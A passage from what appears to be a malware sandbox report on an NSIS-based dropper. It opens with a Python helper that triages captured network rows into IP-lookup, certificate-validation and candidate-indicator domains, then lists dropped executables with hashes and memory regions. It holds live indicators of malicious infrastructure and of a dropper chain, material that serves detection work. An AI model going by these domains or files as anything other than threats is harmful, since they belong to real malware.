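#   <country> <ip>:<port> <domain> <tcp|udp>
ROW_RE = re.compile(r"^([A-Z]{2})\s+(\S+):(\d+)\s+(\S+)\s+(tcp|udp)$")

# Assumed bucket lists (not from the report), seeded with the domains on this page.
IP_LOOKUP = {"iplogger.org", "ip-api.com"}                   # victim IP / geolocation check-in
CERT_VALIDATION_SUFFIXES = (".lencr.org", ".identrust.com")  # Let's Encrypt / IdenTrust CRL and OCSP
ANALYTICS = {"www.google-analytics.com"}

def parse_rows(lines):
    """-> [(country, ip, port, domain, proto)], skipping lines that do not fit the format."""
    rows = []
    for line in lines:
        m = ROW_RE.match(line.strip())
        if m:
            cc, ip, port, domain, proto = m.groups()
            rows.append((cc, ip, int(port), domain, proto))
    return rows

def collapse(rows):
    """(ip, port, domain, proto) -> number of identical rows, in order of first appearance."""
    return Counter((ip, port, domain, proto) for _cc, ip, port, domain, proto in rows)

def unexpected_dns(rows, resolver="8.8.8.8"):
    """Port-53 traffic sent anywhere but the configured resolver. A hard-coded resolver
    sidesteps local DNS logging and filtering, which is why the sandbox flags it."""
    return sorted({(ip, domain) for _cc, ip, port, domain, _p in rows
                   if port == 53 and ip != resolver})

def bucket(domain):
    d = domain.lower()
    if d in IP_LOOKUP:
        return "ip-lookup"
    if d.endswith(CERT_VALIDATION_SUFFIXES):   # side effect of TLS validation, not C2
        return "cert-validation"
    if d in ANALYTICS:
        return "analytics"
    return "other"

def candidate_indicators(rows):
    """Non-DNS endpoints in the 'other' bucket, most contacted first. Block these by
    domain: the addresses are often shared CDN front ends."""
    c = Counter()
    for _cc, ip, port, domain, _proto in rows:
        if port != 53 and bucket(domain) == "other":
            c[(domain, ip, port)] += 1
    return c.most_common()

def beacon_like(rows, min_hits=50):
    """Non-DNS endpoints hit at least min_hits times during the run, whatever their bucket."""
    return [(k, n) for k, n in collapse(rows).items() if n >= min_hits and k[1] != 53]

# Sample rows: a subset copied from the table above, iplogger.org repeated to
# stand in for the 188 connections the full capture shows.
SAMPLE = (
    ["US 8.8.8.8:53 v.xyzgamev.com udp",
     "US 104.21.40.196:443 v.xyzgamev.com tcp",
     "US 8.8.8.8:53 apps.identrust.com udp",
     "NL 104.110.191.182:80 apps.identrust.com tcp",
     "US 216.239.32.178:80 www.google-analytics.com tcp",
     "US 8.8.8.8:53 iplogger.org udp"]
    + ["DE 148.251.234.83:443 iplogger.org tcp"] * 60
    + ["US 8.8.8.8:53 toa.mygametoa.com udp",
       "KR 34.64.183.91:53 toa.mygametoa.com udp",
       "US 208.95.112.1:80 ip-api.com tcp",
       "US 104.21.34.132:443 pp.abcgameabc.com tcp",
       "US 104.21.34.132:443 pp.abcgameabc.com tcp",
       "US 8.8.8.8:53 x2.c.lencr.org udp",
       "NL 23.2.164.159:80 x2.c.lencr.org tcp"]
)

if __name__ == "__main__":
    rows = parse_rows(SAMPLE)
    print("unexpected DNS destinations:", unexpected_dns(rows))
    print("beacon-like endpoints:", beacon_like(rows))
    print("candidate indicators:", candidate_indicators(rows))
    for (ip, port, domain, proto), n in collapse(rows).items():
        print(f"{bucket(domain):16} {domain:28} {ip}:{port}/{proto} x{n}")
```

Note that toa.mygametoa.com never shows up in candidate_indicators: the capture holds only its DNS lookups, so the name is an indicator but there is no flow to attach a port or address to.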

Files

memory/1420-54-0x0000000000BF0000-0x0000000001068000-memory.dmp

memory/1420-55-0x0000000075591000-0x0000000075593000-memory.dmp

\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe

MD5 0ccbbd11fdb0b98910d4205e46024827
SHA1 ffc930a70ee66f008e466991af30b722a7aadd62
SHA256 9b4c6a2b6b779596b19ef74180dcaa82598dd28d881b667565b59156a2e7f5dc
SHA512 122be222703e8c28f177e17a87dfcfcb017d2fdbd4c2e554b8a0b2c668b13be6c8e3ad00c2b0948052e289b06918822c2a08b441e0953713d318047272a37f53

memory/1660-58-0x0000000000000000-mapping.dmp

memory/1660-61-0x0000000000400000-0x00000000004D1000-memory.dmp

memory/1660-62-0x0000000000400000-0x00000000004D1000-memory.dmp

\Users\Admin\AppData\Local\Temp\mali.exe

MD5 b7a7649929bfae3f163849925dd91166
SHA1 930c58877a1310c9f2feaa8cf2927098a68cd46e
SHA256 102711491df8626a33b1cfea7d7e840c391205f3e7f3408a428645b609643d50
SHA512 bd3263e65ab2bcc36c14a0546bcbc9b858b2c6fbdc4dfa2c5169451f6dade38f960e4fedf76bf925e6850f1760e5b2cb429b93ea68b2e40ea1dca40545eb776c

memory/1968-66-0x0000000000000000-mapping.dmp

memory/1420-69-0x0000000005530000-0x0000000005601000-memory.dmp

memory/1660-72-0x0000000000500000-0x0000000000518000-memory.dmp

memory/1732-74-0x0000000000000000-mapping.dmp

memory/1660-76-0x0000000000400000-0x00000000004D1000-memory.dmp

memory/1660-78-0x0000000000320000-0x0000000000359000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\inst1.exe

MD5 6454c263dc5ab402301309ca8f8692e0
SHA1 3c873bef2db3b844dc331fad7a2f20a1f0559759
SHA256 3f933885b67817db600687b4f59a67901f3d25d4e5fffd15ead10b356b43ad5e
SHA512 db9f4e73fcc73eb6d9adae1a2658d9c0f07da126a1d989cd4aa33f42ceb7c182bc97fb76f9d8ac3689c7c94027216b37326036f16a015ca1ba524dad59e4e8e9

memory/1420-71-0x0000000005530000-0x0000000005601000-memory.dmp

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cb696bd52785bb4b873a5c3a7b681778
SHA1 4053f0ba7eafd38693f940a05ed4574f44a212ce
SHA256 d6b196e8c620269c3a0599ea5c7128269443e372c14f93c31b60503e4ce7db9d
SHA512 d54fd2f0d542dc92cbd5fcd4c792d9709d6fd1c595dce3ac0ad498759d218f73207b125c6ffb8c890b6ab03dbe724fefbc079cf6d306b004fed822778cafa2b3

memory/1732-83-0x00000000001C0000-0x00000000001D0000-memory.dmp

memory/1732-84-0x00000000001F0000-0x0000000000203000-memory.dmp

memory/1692-86-0x0000000000000000-mapping.dmp

memory/1708-89-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\askinstall63.exe

MD5 71d7d7d75e1907f03f46470212981361
SHA1 8ec2e0ab43842c86fdcdb1e43211b538d0a7b55a
SHA256 0e03a756be893248f900805f78517d69b8281d8aa94dd25e219ea008e8bade74
SHA512 5f07aa4f15babb0a3922eae56cfe46d2e726e3f6a6bd197ddaa77d045e79a7f95442049b9a3107891e73ae4455275cb376ecda8befd1b1422c0121db4f07a305

memory/1748-95-0x0000000000000000-mapping.dmp

memory/1196-103-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\Routes Installation.exe

MD5 92b56a901a8e317245d1655156b0aa11
SHA1 5a944171891dd0e94857f9f76bedb0459a76dccd
SHA256 8f001dfd8f37c5c957aebd56f83a8081a56585eae52f0aa9ca2714409c03d999
SHA512 4202ff9f62743a48ebca081f51780fb5c46e69e0ac190f4c471672a452305a8f9077e44beff3b44624c02c6ffde5fd3fbc6a25ae1d66bf4233c8098b1f5635b6

memory/1692-106-0x0000000000240000-0x0000000000340000-memory.dmp

memory/864-109-0x0000000000000000-mapping.dmp

memory/1692-111-0x0000000000400000-0x0000000000485000-memory.dmp

memory/1692-108-0x0000000000490000-0x00000000004D3000-memory.dmp

\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe

MD5 20891e0a01056dd43ae77ba6d037549e
SHA1 9dcee5876aaccca6f2d377080a464fae3b85fb96
SHA256 d2322fc880f31e3f9c1f76fcac8ca3048e565039a9a4352a09a7081ef3ebe1ec
SHA512 1fecd44c1b4f1e9ff137747d382427767dd059dd81d470d8b3304ae987a2d22a4a98700d27a551c4c13aecab5a853e4ef03ed6b419d5ee6cd7c24193538f6ed5

\Users\Admin\AppData\Local\Temp\nsi9F1.tmp\System.dll

MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

System.dll here, and INetC.dll below in the same nsi9F1.tmp directory, are stock NSIS plugins (the System plugin, which lets installer script call Win32 APIs, and the Inetc download plugin) unpacked by the NSIS-built dropper behind the "NSIS installer" signature. Their hashes identify an NSIS plugin build rather than this malware, so they are weak indicators on their own; the presence of the download plugin is consistent with the "Downloads MZ/PE file" behaviour.

memory/572-117-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\nsi9F1.tmp\INetC.dll

MD5 2b342079303895c50af8040a91f30f71
SHA1 b11335e1cb8356d9c337cb89fe81d669a69de17e
SHA256 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f
SHA512 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

C:\Users\Admin\AppData\Local\Temp\anytime1.exe

MD5 a37a675a8295d236cfac03f3edd4a3f2
SHA1 747fd82d2cf6858dca46ab57f996b17804731101
SHA256 12fa1a9cf6a062fdae368819bd1daab1317348b2bb8b255036f8b4d66d499f39
SHA512 f7a53fc66ed9b2af9803ee86b6e848b2414bcad27f319f7e9998b6ccae8fedd3b73a9b47a8c20fdbc447fa368774dcd2f52421b344fc6138a01b39b5792d1b69

C:\Users\Admin\AppData\Local\Temp\anytime2.exe

MD5 c1842a8b51b5c04c57ac3e26cf7f8803
SHA1 2d2be700c6d60cabb8fd1c386d30b663a94fe57a
SHA256 c901a67e085946e2b7bdef83b94d3dc1da2f02e049b7af05018d5e48bcd08cd8
SHA512 0490e3380e53437f8193971230b5664a752b33fdc1c2e00e53cca47b9e78a8d4f7a6d28d0751f2dc594d84f105f3cd6abe0b8f51762e40176443748dd10711ff

memory/1424-126-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\anytime3.exe

MD5 d3128e4df693c5084e7d4ee8f0d8a28c
SHA1 84a526a23cf7637e52f3e993583789d5b7786be7
SHA256 8c1de8d3475a3a1ebcf9fe49540b638452454fb04d477f14ed1b8389dfebb297
SHA512 44301a1807ec9ee02ed72afb3eddc8a11ba729e8ec57f0dc143ed0d5bff597d2c0abd2b66abd2afb928f6e09b4ed7be258255282d5040e14eead641e1e2f954b

\Users\Admin\AppData\Local\Temp\anytime3.exe

MD5 d3128e4df693c5084e7d4ee8f0d8a28c
SHA1 84a526a23cf7637e52f3e993583789d5b7786be7
SHA256 8c1de8d3475a3a1ebcf9fe49540b638452454fb04d477f14ed1b8389dfebb297
SHA512 44301a1807ec9ee02ed72afb3eddc8a11ba729e8ec57f0dc143ed0d5bff597d2c0abd2b66abd2afb928f6e09b4ed7be258255282d5040e14eead641e1e2f954b

C:\Users\Admin\AppData\Local\Temp\anytime3.exe

MD5 d3128e4df693c5084e7d4ee8f0d8a28c
SHA1 84a526a23cf7637e52f3e993583789d5b7786be7
SHA256 8c1de8d3475a3a1ebcf9fe49540b638452454fb04d477f14ed1b8389dfebb297
SHA512 44301a1807ec9ee02ed72afb3eddc8a11ba729e8ec57f0dc143ed0d5bff597d2c0abd2b66abd2afb928f6e09b4ed7be258255282d5040e14eead641e1e2f954b

memory/2004-130-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\anytime4.exe

MD5 1c1c1a036ba9fd42f0934699b72b69a7
SHA1 2737478c4339e96f24b8f398cb915c6fd6175a70
SHA256 3c57830974bf9c9228e102599aefdcf40aca3615f69208652eec3c4495eeafc9
SHA512 e41fea6b2b4c207ed4f6c06723cada2f316a0ba72e902ad41c725fdb0e118012ccfec5da2ec3a032a8a42c379dac8056d37da1cb70b3d024a36b4860459100bc

\Users\Admin\AppData\Local\Temp\anytime4.exe

MD5 1c1c1a036ba9fd42f0934699b72b69a7
SHA1 2737478c4339e96f24b8f398cb915c6fd6175a70
SHA256 3c57830974bf9c9228e102599aefdcf40aca3615f69208652eec3c4495eeafc9
SHA512 e41fea6b2b4c207ed4f6c06723cada2f316a0ba72e902ad41c725fdb0e118012ccfec5da2ec3a032a8a42c379dac8056d37da1cb70b3d024a36b4860459100bc

C:\Users\Admin\AppData\Local\Temp\anytime2.exe

MD5 c1842a8b51b5c04c57ac3e26cf7f8803
SHA1 2d2be700c6d60cabb8fd1c386d30b663a94fe57a
SHA256 c901a67e085946e2b7bdef83b94d3dc1da2f02e049b7af05018d5e48bcd08cd8
SHA512 0490e3380e53437f8193971230b5664a752b33fdc1c2e00e53cca47b9e78a8d4f7a6d28d0751f2dc594d84f105f3cd6abe0b8f51762e40176443748dd10711ff

memory/996-122-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\anytime2.exe

MD5 c1842a8b51b5c04c57ac3e26cf7f8803
SHA1 2d2be700c6d60cabb8fd1c386d30b663a94fe57a
SHA256 c901a67e085946e2b7bdef83b94d3dc1da2f02e049b7af05018d5e48bcd08cd8
SHA512 0490e3380e53437f8193971230b5664a752b33fdc1c2e00e53cca47b9e78a8d4f7a6d28d0751f2dc594d84f105f3cd6abe0b8f51762e40176443748dd10711ff

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe

MD5 20891e0a01056dd43ae77ba6d037549e
SHA1 9dcee5876aaccca6f2d377080a464fae3b85fb96
SHA256 d2322fc880f31e3f9c1f76fcac8ca3048e565039a9a4352a09a7081ef3ebe1ec
SHA512 1fecd44c1b4f1e9ff137747d382427767dd059dd81d470d8b3304ae987a2d22a4a98700d27a551c4c13aecab5a853e4ef03ed6b419d5ee6cd7c24193538f6ed5

memory/2004-138-0x0000000000820000-0x0000000000828000-memory.dmp

memory/1424-137-0x0000000000C60000-0x0000000000C68000-memory.dmp

memory/572-136-0x0000000000EE0000-0x0000000000EE8000-memory.dmp

memory/996-135-0x0000000000E90000-0x0000000000E98000-memory.dmp

memory/1368-140-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\anytime5.exe

MD5 5a940f37dbd4b2a11cbad4e6d2894362
SHA1 be6de46fbdfdbaf55ce4a8b019ec6a977451a383
SHA256 64c3ba6d9901d646fca4c4a6abe61d0600d2fae72e022866a58a5da8ba491681
SHA512 ee9fa303fc03a47627f0336d00a534949e24d74908bc69f1064e6f53579ef3170b5821e4149c1c7b355c992192e66269cb0dc903ea475079ae4554f068dafc15

memory/1368-143-0x0000000000DD0000-0x0000000000DD8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\anytime5.exe

MD5 5a940f37dbd4b2a11cbad4e6d2894362
SHA1 be6de46fbdfdbaf55ce4a8b019ec6a977451a383
SHA256 64c3ba6d9901d646fca4c4a6abe61d0600d2fae72e022866a58a5da8ba491681
SHA512 ee9fa303fc03a47627f0336d00a534949e24d74908bc69f1064e6f53579ef3170b5821e4149c1c7b355c992192e66269cb0dc903ea475079ae4554f068dafc15

memory/748-145-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\anytime6.exe

MD5 253d21cd11dd8ad4830fa5e523754b4d
SHA1 66b0e2e1978186cec8ed9b997dca2e7689c315f7
SHA256 3a186d2cb0f5c7313ce70335bf022a8ad0d5f2a0c78afdc803bae5805b7c6e70
SHA512 6f3e9e59fbf1d60cc686c4f7cfce2ffd1907027d434e0ea325b6542b5fb00c99272c4efb7cf72085b2ca771199fe42e178824e63a3d8f491e5fefaebd07de8c2

C:\Users\Admin\AppData\Local\Temp\anytime6.exe

MD5 253d21cd11dd8ad4830fa5e523754b4d
SHA1 66b0e2e1978186cec8ed9b997dca2e7689c315f7
SHA256 3a186d2cb0f5c7313ce70335bf022a8ad0d5f2a0c78afdc803bae5805b7c6e70
SHA512 6f3e9e59fbf1d60cc686c4f7cfce2ffd1907027d434e0ea325b6542b5fb00c99272c4efb7cf72085b2ca771199fe42e178824e63a3d8f491e5fefaebd07de8c2

memory/748-148-0x0000000000D20000-0x0000000000D28000-memory.dmp

memory/1568-150-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\anytime7.exe

MD5 1108c7f8925586a62a3ce9972afb0c97
SHA1 2002d5a140c853ff6b16de5f25431771175f948e
SHA256 8dd5136b976d4fdfa0b1ff685f78806123f1bcf781fc2e39904f0530bc11112d
SHA512 0182c633085afa12e7a416b212bb468372a4bed54b4d4a559cb69c718c42fd4afe88c7af8c0f0357dcfa1fbdba59da9e5c05c7cb73bca3debd11c86a171c994c

C:\Users\Admin\AppData\Local\Temp\anytime7.exe

MD5 1108c7f8925586a62a3ce9972afb0c97
SHA1 2002d5a140c853ff6b16de5f25431771175f948e
SHA256 8dd5136b976d4fdfa0b1ff685f78806123f1bcf781fc2e39904f0530bc11112d
SHA512 0182c633085afa12e7a416b212bb468372a4bed54b4d4a559cb69c718c42fd4afe88c7af8c0f0357dcfa1fbdba59da9e5c05c7cb73bca3debd11c86a171c994c

memory/1568-153-0x00000000012A0000-0x00000000012A8000-memory.dmp

memory/1984-157-0x0000000000000000-mapping.dmp

memory/1984-160-0x0000000000280000-0x0000000000288000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\anytime8.exe

MD5 258b1f4b9b3e8238c677756c45b227dd
SHA1 bc4de5d2c5cd99d68dab277a46e8f2b77f9dace4
SHA256 cad945acf0a184ccbaba2f75e76ddd7f7b233845600aeb5830288f2a1f43357b
SHA512 33af399ce66e09162c1c35b9fd9f7fae423c9280d42d340effdb093d0c9a1c25f4c0fdd5170cdc7eb32db52eae7b5eb8280b139222c0607f137588bd3d6cb709

memory/1944-161-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\anytime8.exe

MD5 258b1f4b9b3e8238c677756c45b227dd
SHA1 bc4de5d2c5cd99d68dab277a46e8f2b77f9dace4
SHA256 cad945acf0a184ccbaba2f75e76ddd7f7b233845600aeb5830288f2a1f43357b
SHA512 33af399ce66e09162c1c35b9fd9f7fae423c9280d42d340effdb093d0c9a1c25f4c0fdd5170cdc7eb32db52eae7b5eb8280b139222c0607f137588bd3d6cb709

\Users\Admin\AppData\Local\Temp\anytime8.exe

MD5 258b1f4b9b3e8238c677756c45b227dd
SHA1 bc4de5d2c5cd99d68dab277a46e8f2b77f9dace4
SHA256 cad945acf0a184ccbaba2f75e76ddd7f7b233845600aeb5830288f2a1f43357b
SHA512 33af399ce66e09162c1c35b9fd9f7fae423c9280d42d340effdb093d0c9a1c25f4c0fdd5170cdc7eb32db52eae7b5eb8280b139222c0607f137588bd3d6cb709

memory/1624-154-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\anytime7.exe

MD5 1108c7f8925586a62a3ce9972afb0c97
SHA1 2002d5a140c853ff6b16de5f25431771175f948e
SHA256 8dd5136b976d4fdfa0b1ff685f78806123f1bcf781fc2e39904f0530bc11112d
SHA512 0182c633085afa12e7a416b212bb468372a4bed54b4d4a559cb69c718c42fd4afe88c7af8c0f0357dcfa1fbdba59da9e5c05c7cb73bca3debd11c86a171c994c

C:\Users\Admin\AppData\Local\Temp\anytime6.exe

MD5 253d21cd11dd8ad4830fa5e523754b4d
SHA1 66b0e2e1978186cec8ed9b997dca2e7689c315f7
SHA256 3a186d2cb0f5c7313ce70335bf022a8ad0d5f2a0c78afdc803bae5805b7c6e70
SHA512 6f3e9e59fbf1d60cc686c4f7cfce2ffd1907027d434e0ea325b6542b5fb00c99272c4efb7cf72085b2ca771199fe42e178824e63a3d8f491e5fefaebd07de8c2

C:\Users\Admin\AppData\Local\Temp\anytime5.exe

MD5 5a940f37dbd4b2a11cbad4e6d2894362
SHA1 be6de46fbdfdbaf55ce4a8b019ec6a977451a383
SHA256 64c3ba6d9901d646fca4c4a6abe61d0600d2fae72e022866a58a5da8ba491681
SHA512 ee9fa303fc03a47627f0336d00a534949e24d74908bc69f1064e6f53579ef3170b5821e4149c1c7b355c992192e66269cb0dc903ea475079ae4554f068dafc15

memory/1904-164-0x0000000000000000-mapping.dmp

memory/1904-167-0x00000000008D0000-0x00000000008D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

MD5 2f2a49d381d18358d7a34aaf8dc50b2e
SHA1 051ae304b8e4bc64078d9d4a788f6580f79cfe2c
SHA256 84bc10f1bffe5ea780dcdb912a71561d5df68553467ef4ee79224e6bca281567
SHA512 f7561e9625d88c8d01e924fbd8e9bee1a8e43b9b99ffaafb28c2fc707fd59cce1ec84ea79218f7577294dd0bfac161a23e948a66e06569b8b2863cce8c61b910

\Users\Admin\AppData\Local\Temp\bearvpn3.exe

MD5 2f2a49d381d18358d7a34aaf8dc50b2e
SHA1 051ae304b8e4bc64078d9d4a788f6580f79cfe2c
SHA256 84bc10f1bffe5ea780dcdb912a71561d5df68553467ef4ee79224e6bca281567
SHA512 f7561e9625d88c8d01e924fbd8e9bee1a8e43b9b99ffaafb28c2fc707fd59cce1ec84ea79218f7577294dd0bfac161a23e948a66e06569b8b2863cce8c61b910

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e93d10ba6bc6f568fca93aae2f99d29c
SHA1 ddb3662ff4f606ecd8c56378a04da381e06bb16a
SHA256 af72425990cdbc8c470fdb6b77e5f0d9352123386ba2cb7e468f24f763e3baf3
SHA512 3f7fbadac32a7792a8faf0fd3f8c3e046bb3f691db326ad60bc6f67264444a16d4ad5308c3ab62a421ce3cac4e4d8f45e5ec98420c42616cd51e9378de9bf0f4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1566375386e4d17fbbda0ca4e9cc54a7
SHA1 d58f076a6a8d5c4be31b4710138a9829a31e4dcc
SHA256 7033135391037d13e43e4a4e9594ba0967a3017c263067ee1d4b1073cdb25994
SHA512 37fb70cc7683551c9e5b0bd49410b1158025d7073276dd3e0d905b734470f585ed53fe140dd261e747d22bb4109bd0c2ebfc03aa2dec48c00de24099d36ad734

\Users\Admin\AppData\Local\Temp\nsi9F1.tmp\INetC.dll

MD5 2b342079303895c50af8040a91f30f71
SHA1 b11335e1cb8356d9c337cb89fe81d669a69de17e
SHA256 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f
SHA512 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3bebe3ddca6f120754e278aa57be8231
SHA1 c10600c5f4a5eb274cb0e676ae0449e42fd8d2fa
SHA256 c74cb7b5047eb7e4db22c21cdbffcd5c5c48a5a9250abce07f964a90a3e5fa31
SHA512 b14bca341e84c1b2965ba64f9abc9ab8a919e5d2ca398a15cbf20efbe5a0788a21db7253b27655a7158450f321dd20464bc7a06ef7adff16241988dd05cd122d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a60ee2b8d8e1615b82dcb58651c04904
SHA1 455713f1c91646c0a3cc5475718996d1c7031819
SHA256 91bce48c06d6de6a2690ea1e24d14829a33c3eb74c5eeb6cb62431623ab63e51
SHA512 a9ddbb4109dc959be48113b820099b57827eb18b220748d4d20cc0a06f028d295c7eecc1a01fc98d9e05d6375e93c68589658443b96fdfc8c8681bcb74686815

memory/1692-173-0x0000000000240000-0x0000000000340000-memory.dmp

memory/1692-174-0x0000000000400000-0x0000000000485000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\db.dll

MD5 18bf5ab8773740f03ba1462c01153540
SHA1 872cc1f2ab2358c09735ed80289160ca28905371
SHA256 30a5c2aeacb50bfa1892f4c6851413adb6e5d93d0c99d5e631920aee4892db3a
SHA512 3828d905159fd01aedd63ffb5fd738dc6a7cb912dd982f1be03e3f3772cb45746e1e0d878f34e5f586b4e014a032ed98bb579a5fc4a39ead7497dce25be07701

memory/2464-176-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\db.dll

MD5 18bf5ab8773740f03ba1462c01153540
SHA1 872cc1f2ab2358c09735ed80289160ca28905371
SHA256 30a5c2aeacb50bfa1892f4c6851413adb6e5d93d0c99d5e631920aee4892db3a
SHA512 3828d905159fd01aedd63ffb5fd738dc6a7cb912dd982f1be03e3f3772cb45746e1e0d878f34e5f586b4e014a032ed98bb579a5fc4a39ead7497dce25be07701

memory/2464-179-0x0000000000BF0000-0x0000000000CF1000-memory.dmp

memory/2532-183-0x00000000FF44246C-mapping.dmp

memory/2532-181-0x00000000000E0000-0x000000000012D000-memory.dmp

memory/2464-180-0x0000000000330000-0x000000000038D000-memory.dmp

memory/2572-184-0x0000000000000000-mapping.dmp

memory/2600-185-0x0000000000000000-mapping.dmp

memory/2532-186-0x00000000000E0000-0x000000000012D000-memory.dmp

memory/2532-187-0x0000000000480000-0x00000000004F2000-memory.dmp

memory/868-188-0x00000000008B0000-0x00000000008FD000-memory.dmp

memory/868-189-0x0000000000BD0000-0x0000000000C42000-memory.dmp

memory/2716-199-0x0000000000000000-mapping.dmp

memory/2532-201-0x0000000002000000-0x000000000201B000-memory.dmp

memory/2532-202-0x0000000003000000-0x0000000003105000-memory.dmp

memory/2532-203-0x00000000020A0000-0x00000000020C0000-memory.dmp

memory/2532-204-0x00000000020C0000-0x00000000020DB000-memory.dmp

memory/2532-205-0x000007FEFC081000-0x000007FEFC083000-memory.dmp

memory/2532-206-0x0000000000480000-0x00000000004F2000-memory.dmp

memory/868-207-0x00000000008B0000-0x00000000008FD000-memory.dmp

memory/2532-208-0x0000000002000000-0x000000000201B000-memory.dmp

memory/2532-209-0x0000000003000000-0x0000000003105000-memory.dmp